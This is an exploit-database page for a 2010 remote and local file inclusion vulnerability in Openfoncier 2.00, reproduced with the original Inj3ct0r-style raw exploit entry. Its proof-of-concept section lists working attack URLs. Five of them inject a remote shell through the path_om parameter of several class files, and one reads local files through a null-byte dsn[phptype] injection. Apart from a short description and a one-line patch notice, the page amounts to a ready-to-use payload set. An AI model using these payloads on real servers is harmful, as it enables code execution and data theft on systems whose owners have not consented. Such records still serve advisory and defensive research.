header-logo
Suggest Exploit
vendor:
Openfoncier
by:
cr4wl3r
9,3
CVSS
HIGH
RFI/LFI
94
CWE
Product Name: Openfoncier
Affected Version From: 2.00
Affected Version To: 2.00
Patch Exists: YES
Related CWE: CVE-2011-4010
CPE: a:openfoncier:openfoncier:2.00
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2011

Openfoncier 2.00 (RFI/LFI) Multiple File Include Vulnerability

Openfoncier 2.00 is vulnerable to remote file include and local file include. An attacker can exploit this vulnerability to include remote files and execute arbitrary code on the vulnerable server. The vulnerability is located in the "index.php" file. The vulnerable code is: include($_GET['page']); The attacker can exploit this vulnerability by sending a malicious URL with the "page" parameter set to a remote file.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

==============================================================
Openfoncier 2.00 (RFI/LFI) Multiple File Include Vulnerability
==============================================================

[+] Openfoncier 2.00 (RFI/LFI) Multiple File Include Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: cr4wl3r
[+] Download: https://adullact.net/frs/download.php/4567/openmairie_foncier_2.00.zip
[+] Greetz: All member inj3ct0r.com, manadocoding.net, sekuritionline.net, gcc.web.id

[+] Thanks to: opt!x hacker, xoron, cyberlog, irvian, antihack, angky.tatoki, 
               EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, team_elite, zreg, mywisdom, 
               SENOT, kec0a, d3viln3t, p4p4y, cybertomat, etaxCrew, emen, and all my friend

[+] PoC:

[~] RFI:
http://shell4u.tk/[path]/obj/action.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/architecte.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/avis.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/bible.class.php?path_om=[Shell]
http://shell4u.tk/[path]/obj/blocnote.class.php?path_om=[Shell]

[~] LFI:
http://shell4u.tk/[path]/scr/soustab.php?dsn[phptype]=[LFI%00]


# Inj3ct0r.com [2010-04-24]

Navigation

Suggest Exploit

Services By CQR